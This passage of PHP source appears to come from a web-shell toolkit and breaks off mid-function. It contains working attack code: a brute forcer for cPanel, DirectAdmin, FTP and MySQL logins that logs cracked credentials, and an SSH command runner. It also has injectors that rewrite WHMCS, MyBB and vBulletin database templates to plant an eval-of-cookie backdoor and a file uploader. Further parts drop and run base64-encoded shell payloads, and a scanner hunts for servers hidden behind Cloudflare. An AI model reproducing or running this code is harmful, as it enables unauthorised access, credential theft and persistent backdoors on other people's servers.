2267elseif(preg_match('/CMD_FILE_MANAGER|frameset/i',$result)){
2268echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2269$info['target'] = $url;
2270CrackerResualt($info);
2271}
2272curl_close($curl);
2273}
2274function Alfa_CP_Cracker($info){
2275$url = $info['protocol'].$info['target'].':'.$info['port'];
2276$curl = curl_init();
2277curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);
2278curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
2279curl_setopt($curl, CURLOPT_SSL_VERIFYPEER,0);
2280curl_setopt($curl, CURLOPT_SSL_VERIFYHOST,0);
2281curl_setopt($curl, CURLOPT_HEADER,0);
2282curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);
2283curl_setopt($curl, CURLOPT_HTTPHEADER, array("Authorization: Basic " . __ZW5jb2Rlcg($info['username'].":".$info['password']) . "\n\r"));
2284curl_setopt($curl, CURLOPT_URL, $url);
2285$result = curl_exec($curl);
2286$curl_errno = curl_errno($curl);
2287$curl_error = curl_error($curl);
2288if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
2289elseif(preg_match('/filemanager/i',$result)){
2290echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2291$info['target'] = $url;
2292CrackerResualt($info);
2293}
2294curl_close($curl);
2295}
2296function Alfa_FTP_Cracker($info){
2297$url = $info['protocol'].$info['target'];
2298$curl = curl_init();
2299curl_setopt($curl, CURLOPT_URL, $url);
2300curl_setopt($curl, CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0');
2301curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
2302curl_setopt($curl, CURLOPT_USERPWD, "".$info['username'].":".$info['password']."");
2303$result = curl_exec($curl);
2304$curl_errno = curl_errno($curl);
2305$curl_error = curl_error($curl);
2306if ($curl_errno > 0) {echo "<font color='red'>Error: $curl_error</font><br>";}
2307elseif(preg_match('/(\d+):(\d+)/i',$result)){
2308echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2309$info['target'] = $url;
2310CrackerResualt($info);
2311}
2312curl_close($curl);
2313}
2314function Alfa_Mysql_Cracker($info){
2315if(@mysqli_connect($info['target'].':'.$info['port'],$info['username'],$info['password'])){
2316CrackerResualt($info);
2317echo 'UserName: <font color="red">'.$info['username'].'</font> PassWord: <font color="red">'.$info['password'].'</font><font color="green"> Login Success....</font><br>';
2318}
2319}
2320function Alfa_FTPC($info){
2321if($con=@ftp_connect($info['target'],$info['port'])){
2322if($con){
2323$login=@ftp_login($con,$info['username'],$info['password']);
2324if($login){CrackerResualt($info);}}}
2325@ftp_close($con);
2326}
2327function CrackerResualt($info){
2328$res = $info['target'].' => '.$info['username'].":".$info['password']."\n" ;
2329$c = @fopen($info['fcrack'],'a+');
2330@fwrite($c, $res);
2331@fclose($c);
2332}
2333function Alfa_Call_Function_Cracker($method,$info){
2334switch($method){case 'cp':return Alfa_CP_Cracker($info);break;case 'direct': case 'phpmyadmin':return Alfa_DirectAdmin_Cracker($info);break;case 'ftp':return Alfa_FTP_Cracker($info);break;case 'mysql':return Alfa_Mysql_Cracker($info);break;case 'mysql':return Alfa_FTPC($info);break;}
2335}
2336function alfaCrackers(){
2337alfahead();
2338AlfaNum(9,10);
2339echo '<div class="header"><center><br><div class="txtfont_header">| Brute Forcer |</div><br><br><form method="post" onsubmit="g(\'Crackers\',null,this.target.value,this.port.value,this.usernames.value,this.passwords.value,this.fcrack.value,\'start\',this.protocol.value,this.loginpanel.value);return false;"><div class="txtfont">Login Page: <select onclick="dis_input(this.value);" name="loginpanel">';
2340foreach(array('cp'=>'Cpanel','direct'=>'DirectAdmin','ftp'=>'FTP','phpmyadmin'=>'PhpMyAdmin[DirectAdmin]','mysql'=>'mysql_connect()','ftpc'=>'ftp_connect()') as $key=>$val)echo('<option value="'.$key.'">'.$val.'</option>');
2341echo '</select> Protocol: <select id="protocol" name="protocol">';
2342foreach(array('https://','http://','ftp://') as $val)echo('<option value="'.$val.'">'.$val.'</option>');
2343echo '</select> Website/ip Address: <input id="target" type="text" name="target" value="localhost">
2344Port: <input id="port" type="text" name="port" value="2083">
2345<table width="30%"><td align="center">Users List</td><td align="center">Passwords</td></table>
2346<textarea placeholder="Users" rows="20" cols="25" name="usernames">'.($GLOBALS['sys']=='unix'?alfaEx("cut -d: -f1 /etc/passwd"):"").'</textarea>
2347  <textarea placeholder="Passwords" rows="20" cols="25" name="passwords"></textarea><br><br>
2348Save Result Into File <input type="text" name="fcrack" value="cracked.txt">
2349<p><input type="submit" name="cracking" value=" " /></div></form></p><center>';
2350$target = str_replace(array('https://','http://','ftp://'),'',$_POST['alfa1']);
2351$port = $_POST['alfa2'];
2352$usernames= $_POST['alfa3'];
2353$passwords = $_POST['alfa4'];
2354$fcrack = $_POST['alfa5'];
2355$cracking = $_POST['alfa6'];
2356$protocol = $_POST['alfa7'];
2357$loginpanel = $_POST['alfa8'];
2358$p = $loginpanel == 'phpmyadmin' ? $p = true : false;
2359if($cracking=='start'){
2360echo __pre();
2361$exuser = explode("\n",$usernames);
2362$expw = explode("\n",$passwords);
2363foreach($exuser as $user){
2364foreach($expw as $pw){
2365$array = array('username' => trim($user),'password' => trim($pw),'port' => trim($port),'target' => trim($target),'protocol' => trim($protocol),'fcrack' => trim($fcrack),'mysql' => $p);
2366Alfa_Call_Function_Cracker($loginpanel,$array);
2367}
2368}
2369echo '<br><font color="red">Attack Finished...</font>';
2370}
2371echo '</div>';
2372alfafooter();
2373}
2374function alfassh2(){
2375if(function_exists('ssh2_connect')){
2376$_SESSION['connected']= false;
2377$ssh_ip = $_POST['alfa1'];
2378$ssh_login = $_POST['alfa2'];
2379$ssh_pass = $_POST['alfa3'];
2380$ssh_port = $_POST['alfa4'];
2381$ssh_command = $_POST['alfa5'];
2382if($alfaconnect2ssh=@ssh2_connect($ssh_ip, $ssh_port))
2383{
2384if($alfalogin=@ssh2_auth_password($alfaconnect2ssh, $ssh_login, $ssh_pass))
2385{
2386$_SESSION['connected']= true;
2387}
2388}
2389if($_SESSION['connected']!== true){
2390alfahead();
2391echo "<div class=header>";
2392echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,this.ssh_ip.value,this.ssh_login.value,this.ssh_pass.value,this.ssh_port.value); return false;'><table cellpadding='2' cellspacing='0'><tr><td><font color=\"#ffffff\"><b>IP</b></font></td><td><font color=\"#ffffff\"><b>SSH USER</b></font></td><td><font color=\"#ffffff\"><b>SSH PASS</b></font></td><td><font color=\"#ffffff\"><b>SSH PORT</b></font></td><td></td></tr><tr><td><input type=text name=ssh_ip value=''></td><td><input type=text name=ssh_login value=''></td><td><input type=text name=ssh_pass value=''></td><td><input type=text name=ssh_port value=''></td><td><input type='submit' name='submit' value=' '></td></table></form></div>";
2393alfafooter();
2394}
2395if($_SESSION['connected']==true){
2396alfahead();
2397echo "<div class=header>";
2398echo "<form name='ssh2' method='post' onsubmit='g(\"ssh2\",null,\"".$ssh_ip."\",\"".$ssh_login."\",\"".$ssh_pass."\",\"".$ssh_port."\",this.ssh_command.value,\">>\"); return false;'><table cellpadding='2' cellspacing='0'><tr><td><input type=text name=ssh_command value=''></td><td><input type='submit' name='execute' value=' '></td></table></form><form name='ssh2' method='post' onsubmit='g(\'ssh2\',null,\'\',\'\',\'\'); return false;'><input type=submit name='destsession' value='logout'></form>";
2399$alfastream = ssh2_exec($alfaconnect2ssh, $ssh_command);
2400stream_set_blocking($alfastream,true);
2401$output = ssh2_fetch_stream($alfastream,SSH2_STREAM_STDIO);
2402if($_POST['alfa6']=='>>'){
2403echo '<pre class=ml1>';
2404ob_start();
2405echo stream_get_contents($output);
2406echo htmlspecialchars(ob_get_clean());
2407}
2408echo "</div>";
2409alfafooter();
2410}}else{
2411alfahead();
2412echo '<div class=header><p><center><b><font color="red">Server does not support SSH2</font><p></b></center></div>';
2413alfafooter();
2414}
2415}
2416function output($string){ echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><font color=red><a target='_blank' href='".$string."'>Click Here !</a></font></b></center><br><br>";}
2417function alfaShellInjectors(){
2418alfahead();
2419echo '<div class=header>';
2420AlfaNum(11);
2421echo '<center><p><div class="txtfont_header">| Cms Shell Injector |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,\'whmcs\',null)">| WHMCS | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,\'mybb\')">| MyBB | </a><a href=javascript:void(0) onclick="g(\'ShellInjectors\',null,null,null,\'vb\')">| vBulletin |</a></h3></center>';
2422$selector = '<p><div class="txtfont">Shell Inject Method : </div> <select name="method" style="width:100px;"><option value="auto">AutoMatic</option><option value="man">Manuel</option></select></p>';
2423if(isset($_POST['alfa1']) && $_POST['alfa1']== 'whmcs'){
2424AlfaNum();
2425echo __pre()."<p><div class='txtfont_header'>| WHMCS |</div></p><center><center><p>".getConfigHtml('whmcs')."</p><form onSubmit=\"g('ShellInjectors',null,'whmcs',null,null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.path.value); return false;\" method='post'>";
2426$table = array('td1' =>
2427 array('color' => 'FFFFFF', 'tdName' => 'Path WHMCS Url : ', 'inputName' => 'path', 'inputValue' => 'http://site.com/whmcs', 'inputSize' => '50'),
2428 'td2' =>
2429 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host : ', 'inputName' => 'dbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
2430 'td3' =>
2431 array('color' => 'FFFFFF', 'tdName' => 'Db Name : ', 'inputName' => 'dbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
2432 'td4' =>
2433 array('color' => 'FFFFFF', 'tdName' => 'Db User : ', 'inputName' => 'dbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
2434 'td5' =>
2435 array('color' => 'FFFFFF', 'tdName' => 'Db Pass : ', 'inputName' => 'dbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
2436);
2437create_table($table);
2438echo $selector;
2439echo "<p><input type='submit' value=' '></p></form></center></td></tr></table></center>";
2440if(isset($_POST['alfa6'])) {
2441$dbu = $_POST['alfa6'];
2442$dbn = $_POST['alfa7'];
2443$dbp = $_POST['alfa8'];
2444$dbh = $_POST['alfa9'];
2445$path = $_POST['alfa10'];
2446$method = $_POST['alfa4'];
2447$index = "{php}".ALFA_UPLOADER.";{/php}";
2448$newin = str_replace("'","\'",$index);
2449$newindex = "<p>Dear $newin,</p><p>Recently a request was submitted to reset your password for our client area. If you did not request this, please ignore this email. It will expire and become useless in 2 hours time.</p><p>To reset your password, please visit the url below:<br /><a href=\"{\$pw_reset_url}\">{\$pw_reset_url}</a></p><p>When you visit the link above, your password will be reset, and the new password will be emailed to you.</p><p>{\$signature}</p>{php}if(\$_COOKIE[\"sec\"] == \"123\"){eval(base64_decode(\$_COOKIE[\"sec2\"])); die(\"!\");}{\/php}";
2450if(!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)){
2451if(filter_var($path,FILTER_VALIDATE_URL)){
2452$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
2453$soleSave= mysqli_query($conn,"select message from tblemailtemplates where name='Password Reset Validation'");
2454$soleGet = mysqli_fetch_assoc($soleSave);
2455$tempSave1 = $soleGet['message'];
2456$tempSave = str_replace("'","\'",$tempSave1);
2457$inject = "UPDATE tblemailtemplates SET message='$newindex' WHERE name='Password Reset Validation'";
2458$result = mysqli_query($conn,$inject) or die (mysqli_error($conn));
2459$create = "insert into tblclients (email) values('solevisible@fbi.gov')";
2460$result2 = mysqli_query($conn,$create) or die (mysqli_error($conn));
2461if(function_exists('curl_version') && $method == 'auto'){
2462$AlfaSole = new AlfaCURL(true);
2463$saveurl = $AlfaSole->Send($path."/pwreset.php");
2464$getToken = preg_match("/name=\"token\" value=\"(.*?)\"/i",$saveurl,$token);
2465$AlfaSole->Send($path."/pwreset.php","post","token={$token[1]}&action=reset&email=solevisible@fbi.gov");
2466$backdata = "UPDATE tblemailtemplates SET message='{$tempSave}' WHERE name='Password Reset Validation'";
2467$Solevisible = mysqli_query($conn,$backdata) or die (mysqli_error($conn));
2468__alert("shell injectet...");
2469$ff= 'http://'.$path."/solevisible.php";
2470output($ff);}else{
2471echo "<br><pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><center><b><font color=\"#FFFFFF\">Please go to Target => </font><a href='".$path."/pwreset.php' target='_blank'>".$path."/pwreset.php</a><br/><font color='#FFFFFF'> And Reset Password With Email</font> => <font color=red>solevisible@fbi.gov</font><br/><font color='#FFFFFF'>And Go To => </font><a href='".$path."/solevisible.php' target='_blank'>".$path."/solevisible.php</a></b></center><br><br>";}}else{__alert('Path is not Valid...');}}}
2472}if(isset($_POST['alfa2']) && $_POST['alfa2']== 'mybb'){
2473AlfaNum(1,2,3,5);
2474echo __pre()."<p><div class='txtfont_header'>| MyBB |</div></p><center><center>".getConfigHtml("mybb")."<form id='sendajax' onSubmit=\"g('ShellInjectors',null,null,'mybb',null,this.method.value,null,this.dbu.value,this.dbn.value,this.dbp.value,this.dbh.value,this.prefix.value); return false;\" method=POST>
2475";
2476$table = array('td1' =>
2477 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'dbh', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
2478 'td2' =>
2479 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'dbn', 'id'=>'db_name' ,'inputValue' => '', 'inputSize' => '50'),
2480 'td3' =>
2481 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'dbu', 'id'=>'db_user', 'inputValue' => '', 'inputSize' => '50'),
2482 'td4' =>
2483 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'dbp', 'id'=>'db_pw', 'inputValue' => '', 'inputSize' => '50'),
2484 'td5' =>
2485 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'prefix', 'id'=>'db_prefix','inputValue' => 'mybb_', 'inputSize' => '50')
2486);
2487create_table($table);
2488echo $selector;
2489echo "<p><input type=submit value=' '></p></form></center></center>";
2490if(isset($_POST['alfa6'])) {
2491$dbu = $_POST['alfa6'];
2492$dbn = $_POST['alfa7'];
2493$dbp = $_POST['alfa8'];
2494$dbh = $_POST['alfa9'];
2495$prefix = $_POST['alfa10'];
2496$method = $_POST['alfa4'];
2497$shellCode = "{\${".ALFA_UPLOADER."}}";
2498$newinshell = str_replace("'","\'",$shellCode);
2499if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($newinshell)){
2500$conn = mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
2501$inject = "select template from {$prefix}templates where title= 'calendar'";
2502$result = mysqli_query($conn, $inject) or die (mysqli_error($conn));
2503$GetTemp = mysqli_fetch_assoc($result);
2504$saveDate = $GetTemp['template'];
2505$repsave = str_replace($shellCode,"",$saveDate);
2506$repsave = str_replace("'","\'",$repsave);
2507$createShell = "update {$prefix}templates SET template= '".$newinshell.$repsave."' where title = 'calendar'";
2508$result2 = mysqli_query($conn,$createShell) or die (mysqli_error($conn));
2509$geturl = "select value from {$prefix}settings where name= 'bburl'";
2510$findurl = mysqli_query($conn,$geturl) or die (mysqli_error($conn));
2511$rowb = mysqli_fetch_assoc($findurl);
2512$furl = $rowb['value'];
2513$realurl = parse_url($furl,PHP_URL_HOST);
2514$realpath = parse_url($furl,PHP_URL_PATH);
2515$res = false;
2516$AlfaCurl = new AlfaCURL();
2517if (extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto' ){
2518if ($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
2519@fputs($fsock, "GET $realpath/calendar.php HTTP/1.1\r\n");
2520@fputs($fsock, "HOST: $realurl\r\n");
2521@fputs($fsock, "Connection: close\r\n\r\n");
2522$check = fgets($fsock);
2523if(preg_match("/200 OK/i",$check)){
2524$repairdbtemp = "update {$prefix}templates SET template= '$repsave' where title = 'calendar'";
2525$clear = mysqli_query($conn,$repairdbtemp) or die (mysqli_error($conn));$res = true;}
2526@fclose($fsock);}}elseif(function_exists('curl_version') && $method == 'auto'){
2527$AlfaCurl->Send($realurl.$realpath."/calendar.php");
2528$res = true;
2529}
2530if($res){
2531$ff = 'http://'.$realurl.$realpath."/solevisible.php";
2532output($ff);
2533}else{
2534$ff = 'http://'.$realurl.$realpath."/calendar.php";
2535$fff = 'http://'.$realurl.$realpath."/solevisible.php";
2536echo "<br><pre id='strOutput' style='margin-top:5px' class='ml1'><br><center><b><font color='#FFFFFF'>Please Go To Target => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color='#FFFFFF'>And Go To => </font><a href='".$fff."' target='_blank'>".$fff."</a></b></center><br><br>";
2537}}}}
2538if(isset($_POST['alfa3']) && $_POST['alfa3']== 'vb'){
2539AlfaNum(1,2,7,9,10);
2540echo __pre().'<p><div class="txtfont_header">| vbulletin |</div></p><p>'.getConfigHtml('vb').'</p><form name="frm" method="POST" onsubmit="g(\'ShellInjectors\',null,null,this.lo.value,\'vb\',this.user.value,this.pass.value,this.tab.value,this.db.value,this.method.value); return false;">';
2541$table = array('td1' =>
2542 array('color' => 'FFFFFF', 'tdName' => 'Host : ', 'inputName' => 'lo', 'id'=>'db_host','inputValue' => 'localhost', 'inputSize' => '50'),
2543 'td2' =>
2544 array('color' => 'FFFFFF', 'tdName' => 'DataBase Name : ', 'inputName' => 'db', 'id'=>'db_name','inputValue' => '', 'inputSize' => '50'),
2545 'td3' =>
2546 array('color' => 'FFFFFF', 'tdName' => 'User Name : ', 'inputName' => 'user', 'id'=>'db_user','inputValue' => '', 'inputSize' => '50'),
2547 'td4' =>
2548 array('color' => 'FFFFFF', 'tdName' => 'Password : ', 'inputName' => 'pass', 'id'=>'db_pw','inputValue' => '', 'inputSize' => '50'),
2549 'td5' =>
2550 array('color' => 'FFFFFF', 'tdName' => 'Table Prefix : ', 'inputName' => 'tab', 'id'=>'db_prefix','inputValue' => '', 'inputSize' => '50')
2551);
2552create_table($table);
2553echo $selector;
2554echo '<p><input type="submit" value=" " /></p></form></center>';
2555if(isset($_POST['alfa4'])&&!empty($_POST['alfa4'])){
2556$method = $_POST['alfa8'];
2557$code = "{\${".ALFA_UPLOADER."}}{\${exit()}}&";
2558$conn=@mysqli_connect($_POST['alfa2'],$_POST['alfa4'],$_POST['alfa5'],$_POST['alfa7']) or die(@mysqli_error($conn));
2559$rec = "select `template` from ".$_POST['alfa6']."template WHERE title ='faq'";
2560$recivedata = @mysqli_query($conn,$rec);
2561$getd = @mysqli_fetch_assoc($recivedata);
2562$savetoass = $getd['template'];
2563$code = str_replace("'","\'",$code);
2564$p = "UPDATE ".$_POST['alfa6']."template SET `template`='".$code."' WHERE `title`='faq'";
2565$ka= @mysqli_query($conn,$p) or die(mysqli_error($conn));
2566$geturl = @mysqli_query($conn,"select `value` from ".$_POST['alfa6']."setting WHERE `varname`='bburl'");
2567$getval = @mysqli_fetch_assoc($geturl);
2568$saveval = $getval['value'];
2569$realurl = parse_url($saveval,PHP_URL_HOST);
2570$realpath = parse_url($saveval,PHP_URL_PATH);
2571$res = false;
2572$AlfaCurl = new AlfaCURL();
2573if(extension_loaded('sockets') && function_exists('fsockopen') && $method == 'auto'){
2574if($fsock = @fsockopen($realurl, 80, $errno, $errstr, 10)){
2575@fputs($fsock, "GET $realpath/faq.php HTTP/1.1\r\n");
2576@fputs($fsock, "HOST: $realurl\r\n");
2577@fputs($fsock, "Connection: close\r\n\r\n");
2578$check = fgets($fsock);
2579if(preg_match("/200 OK/i",$check)){
2580$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
2581$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
2582$res = true;
2583}
2584@fclose($fsock);
2585}
2586}elseif(function_exists('curl_version') && $method == 'auto'){
2587$AlfaCurl->Send($realurl.$realpath."/faq.php");
2588$p1 = "UPDATE ".$_POST['alfa6']."template SET template ='".str_replace("'","\'",$savetoass)."' WHERE title ='faq'";
2589$ka1= @mysqli_query($conn,$p1) or die(mysqli_error($conn));
2590$res = true;
2591}
2592if($res){
2593$ff = 'http://'.$realurl.$realpath."/solevisible.php";
2594output($ff);
2595}else{
2596$ff = 'http://'.$realurl.$realpath."/faq.php";
2597$fff = 'http://'.$realurl.$realpath."/solevisible.php";
2598echo "<center><p><font color=\"#FFFFFF\">First Open This Link => </font><a href='".$ff."' target='_blank'>".$ff."</a><br/><font color=\"#FFFFFF\">Second Open This Link => </font><a href='".$fff."' target='_blank'>".$fff."</a></center></p>";}}}
2599echo '</div>';
2600alfafooter();
2601}
2602function alfaupdatepath(){
2603 if($_POST['path']!=''){
2604 $_SESSION[__LAST_CWD__] = $_POST['path'];
2605 }
2606 echo($_SESSION[__LAST_CWD__]);
2607}
2608function alfacheckfiletype(){
2609 $path = $_POST['path'];
2610 $arg = $_POST['arg'];
2611 if(@is_file($path.'/'.$arg)){
2612 echo("file");
2613 }else{
2614 echo("dir");
2615 }
2616}
2617function alfacheckupdate(){
2618 if(!isset($_COOKIE['alfa_checkupdate'])){
2619 if(function_exists("curl_version")){
2620 $update = new AlfaCURL();
2621 $json = $update->Send("http://solevisible.com/update.json");
2622 $json = @json_decode($json);
2623 if($json){
2624 if(__ALFA_VERSION__ != $json->version){
2625 @setcookie("alfa_checkupdate", "1", time()+86400);
2626 echo('<div class="update-holder"><div class="update-partner"><div class="update-content"><div onClick="document.getElementsByClassName(\'update-holder\')[0].style.display = \'none\';" class="update-close">X</div><a href="'.$json->url.'" target="_blank">'.$json->text.'<br> Version: '.$json->version.'</a></div></div></div>');
2627 }
2628 }
2629 }
2630 }
2631}
2632function alfaWriteTocgiapi($name, $source){
2633 @chdir(dirname($_SERVER["SCRIPT_FILENAME"]));
2634 @mkdir('alfacgiapi',0755);
2635 __write_file("alfacgiapi/".$name, __get_resource($source));
2636 @chmod("alfacgiapi/".$name, 0755);
2637}
2638function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}
2639function alfaupdateheader(){
2640 if(!isset($_SESSION["updateheader_data"])){
2641 $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
2642 $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
2643 alfaWriteTocgiapi("getheader.alfa",$bash);
2644 $data = alfaEx("cd '{$realdir}/alfacgiapi';sh getheader.alfa",false,true,true);
2645 if(@is_array(@json_decode($data,true))){
2646 $_SESSION["updateheader_data"] = $data;
2647 echo $data;
2648 }
2649 }else{
2650 echo $_SESSION["updateheader_data"];
2651 }
2652}
2653function alfassiShell(){
2654alfahead();
2655echo '<div class=header>';
2656@mkdir('alfa_shtml',0755);
2657@chdir('alfa_shtml');
2658alfacgihtaccess('shtml');
2659$code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';
2660@__write_file('alfa_ssi.shtml',__get_resource($code));
2661@chmod("alfa_ssi.shtml",0755);
2662echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
2663echo '</div>';
2664alfafooter();
2665}
2666function alfacloudflare(){
2667alfahead();
2668AlfaNum(8,9,10,7,6,5,4,3);
2669echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>
2670<p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
2671if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
2672$url = $_POST['alfa1'];
2673if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
2674$url = preg_replace('/^(https?):\/\//', '', $url);
2675$url = "http://www.".$url;
2676}
2677$headers = @get_headers($url, 1);
2678$server = $headers['Server'];
2679$subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');
2680if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){
2681if($matches[2] != 'www'){$url = preg_replace('/^(https?):\/\//', '', $url);}else{
2682$url = explode($matches[0], $url);
2683$url = $url[1];}}
2684if(is_array($server))$server = $server[0];
2685echo __pre();
2686if(preg_match('/cloudflare/i', $server))
2687echo "\n[+] CloudFlare detected: {$server}\n<br>";
